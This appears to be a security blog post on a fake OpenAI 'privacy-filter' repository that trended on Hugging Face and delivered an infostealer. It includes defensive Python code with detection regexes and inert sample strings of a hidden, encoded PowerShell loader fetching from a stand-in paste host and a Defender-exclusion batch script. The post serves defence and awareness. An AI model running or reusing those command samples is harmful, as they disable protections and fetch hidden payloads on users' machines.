
The AI Supply Chain Trap: How a Fake OpenAI Repo Hijacked Hugging Face 🛡️

Posted by Simon Keighley on May 15, 2026 - 8:04am Edited 5/15 at 8:06am


The rapid evolution of Artificial Intelligence has created a "gold rush" atmosphere where developers are eager to integrate the latest models into their workflows. However, this enthusiasm has birthed a dangerous new frontier for cybercriminals: the AI supply chain attack. Recently, a sophisticated campaign proved just how easy it is to deceive even the most tech-savvy users by turning the industry’s most trusted platform into a playground for malware.

The Illusion of Credibility: The Rise of Open-OSS

In late April, OpenAI released "Privacy Filter," an open-weight model designed to help developers protect user data by automatically redacting personally identifiable information (PII). It was a highly anticipated tool that quickly gained traction.

Seeing an opportunity, bad actors created a fake Hugging Face account under the moniker "Open-OSS." They published a repository also named privacy-filter that was, for all intents and purposes, a mirror image of the official OpenAI version. The "model card" and README were copied word-for-word, creating a perfect digital forgery.

The deception worked with terrifying efficiency. In less than 18 hours, the fake repository climbed to the #1 spot on Hugging Face’s trending page, amassing approximately 244,000 downloads and hundreds of likes.

How the Algorithm Was Gamed

You might wonder how a fake repository could outperform legitimate tools so quickly. The answer lies in "manufactured social proof." Security firm HiddenLayer, which investigated the incident, discovered that out of the 667 likes the repo received, 657 came from bot accounts with predictable, auto-generated names.

By using a botnet to inflate download numbers and likes, the attackers tricked the Hugging Face trending algorithm. This gave the repository a veneer of community-vetted legitimacy, leading real developers to trust and download the malicious files without a second thought.
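As an added example (not from HiddenLayer's report or this post), a heuristic that flags a repository whose likers are dominated by clusters of numbered look-alike usernames, which is the kind of "manufactured social proof" described above. The naming template and the sample liker list are constructed assumptions, sized to the 667/657 figures in the text.

```python
import re
from collections import Counter

# Numbered-stem pattern: a lowercase stem followed by a run of digits. The real
# naming template of the bot accounts is not given in the report, so this is an
# assumption for illustration; the clustering logic is the part that matters.
NUMBERED = re.compile(r"^(?P<stem>[a-z][a-z_-]*?)(?P<num>\d{2,})$")

def bot_like_accounts(names, min_cluster=5):
    """Names that look auto-generated: stem + number, where the same stem
    recurs at least min_cluster times among the likers."""
    stems = Counter()
    parsed = {}
    for name in names:
        m = NUMBERED.match(name.lower())
        if m:
            parsed[name] = m.group("stem")
            stems[m.group("stem")] += 1
    return {n for n, s in parsed.items() if stems[s] >= min_cluster}

def assess_likes(names, max_bot_share=0.3):
    """Summarise a repo's likers and flag it when bot-like accounts dominate."""
    bots = bot_like_accounts(names)
    share = len(bots) / len(names) if names else 0.0
    return {"likes": len(names), "bot_like": len(bots),
            "bot_share": round(share, 3), "suspicious": share > max_bot_share}

# Constructed sample sized to the reported figures: 667 likes, 657 from bots.
ORGANIC = ["alice", "bob-dev", "ml_researcher", "jane.doe", "kwon", "dataguy",
           "priya-s", "tomas", "ranjit", "nlp_lab"]
BOTS = [f"hfuser{i:04d}" for i in range(657)]
SAMPLE_LIKERS = ORGANIC + BOTS
```

A platform-side check would also look at like timing (a burst within hours) and account age, neither of which this sample models.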

Inside the Payload: A Six-Stage Infostealer

The malware was far more than a simple script; it was a sophisticated, multi-stage operation designed to evade detection and strip a victim's digital life bare.

The "Candy Coating"

When a user ran loader.py (for Mac/Linux) or start.bat (for Windows), the script displayed fake model training output. Developers saw progress bars and synthetic datasets—the exact visual feedback they would expect when loading an AI model.

The Hidden Chain

While the user watched the fake progress bars, the script was busy in the background:

  1. Security Bypass: It quietly disabled security checks and leveraged PowerShell to run hidden commands.
  2. Dynamic Execution: It pulled encoded instructions from a public JSON "paste" site. This allowed the attackers to change the malware's behavior without updating the Hugging Face repo.
  3. Escalation: The script downloaded a custom infostealer written in Rust, added it to Windows Defender’s exclusion list, and launched it with SYSTEM-level privileges.
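A pre-execution audit of a downloaded repo's launcher scripts, written for this article as an added example (not HiddenLayer's or any project's tooling), looking for the stages listed above: hidden or encoded PowerShell, instructions fetched from a paste site, and Defender exclusions. The regexes and the inert sample script text are constructed; Add-MpPreference, -WindowStyle and -EncodedCommand are real PowerShell/Defender switches.

```python
import re
from pathlib import Path

# Heuristic indicators for the stages described above. The regexes are written
# for this example and will need tuning; the switch names they look for are real.
INDICATORS = {
    "hidden_powershell": re.compile(
        r"powershell[^\n]*?(-w(indowstyle)?\W+hidden|-enc(odedcommand)?\b)", re.I),
    "remote_instructions": re.compile(
        r"https?://[^\s'\"]*(paste|jsonblob|jsonbin)[^\s'\"]*", re.I),
    "encoded_exec": re.compile(
        r"(b64decode|FromBase64String)[^\n]*(exec|eval|Invoke-Expression|\biex\b)", re.I),
    "defender_exclusion": re.compile(
        r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)", re.I),
    "av_tampering": re.compile(
        r"Set-MpPreference\s+-Disable\w+|-ExecutionPolicy\s+Bypass", re.I),
}

def audit_script(text):
    """Return the sorted names of the indicators present in a script's text."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def audit_repo(root, launchers=("loader.py", "start.bat")):
    """Audit a downloaded repo's launcher scripts before anyone runs them;
    returns {filename: [indicators]} for each launcher found under root."""
    root = Path(root)
    return {name: audit_script((root / name).read_text(errors="ignore"))
            for name in launchers if (root / name).is_file()}

# Constructed, inert sample text (a string, never executed) of the loader
# described above: fake progress output in front of a hidden PowerShell call
# whose encoded instructions come from a paste site.
SAMPLE_LOADER = '''
print("Loading privacy-filter weights  [#####     ] 50%")
cfg = requests.get("https://paste.example.invalid/raw/abc123").json()
subprocess.run(["powershell", "-WindowStyle", "Hidden", "-EncodedCommand", cfg["c"]])
'''

# Constructed sample of the escalation stage: a Defender exclusion before launch.
SAMPLE_BAT = '''
@echo off
powershell -Command "Add-MpPreference -ExclusionPath %TEMP%"
start "" "%TEMP%\\payload.exe"
'''

# Constructed benign launcher: loads a model through the transformers library.
BENIGN = 'from transformers import pipeline\nnlp = pipeline("token-classification", model=MODEL_ID)\n'
```

Run audit_repo on the cloned directory before executing anything in it; any hit is a reason to stop and compare the repo against the publisher's official account.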

What Was Stolen?

The final payload was a "vacuum" for sensitive data. It targeted:

  • Browsers: Saved passwords, session cookies, and encryption keys from Chrome and Firefox.
  • Crypto Wallets: Seed phrases and private keys.
  • Credentials: SSH keys and FTP logins.
  • Privacy: It even took screenshots across all connected monitors.

Once the data was harvested, it was bundled into a compressed JSON file and shipped off to the attackers' servers. To make matters worse, the malware featured "anti-sandbox" checks; if it detected it was being analyzed by a security researcher in a virtual machine, it would simply shut down to remain undetected.

A Growing Pattern of AI Deception

This wasn't an isolated incident. The infrastructure used for this attack—specifically the domain api.eth-fastscan.org—has been linked to other malicious repositories under the name "anthfu," which impersonated popular models like DeepSeek and Qwen3.

This represents a shift in cybercrime tactics. Instead of trying to hack OpenAI’s servers, criminals are simply "poisoning the well" where developers gather. By exploiting the trust inherent in open-source communities, they can compromise thousands of machines with minimal effort.

What to Do If You Were Infected

If you downloaded the Open-OSS/privacy-filter repository and executed its files on a Windows machine, your system is compromised. Here is the recommended recovery path:

  1. Isolate and Wipe: Stop using the machine immediately. The safest course of action is a complete drive wipe and OS reinstallation.
  2. Reset Credentials: From a clean device, change every password stored in your browser. Invalidate Discord sessions and rotate OAuth tokens.
  3. Secure Assets: Move any cryptocurrency funds to a brand-new wallet address. Assume any seed phrase stored on the infected machine is now in the hands of the attackers.
  4. Burn Keys: Any SSH or FTP keys on the machine must be considered compromised and replaced immediately.

The AI era offers incredible tools for innovation, but the Hugging Face incident serves as a stark reminder: Always verify the publisher. In the world of open-source AI, a "trending" tag is no longer a guarantee of safety.

For more information on this security breach, read the original report on Decrypt:

👉 Fake OpenAI Repo Hit #1 on Hugging Face—And Stole Passwords While It Trended

Disclaimer: This article is provided for informational purposes only, mistakes may be made, and it's not offered or intended to be used as legal, tax, investment, financial, or any other advice.
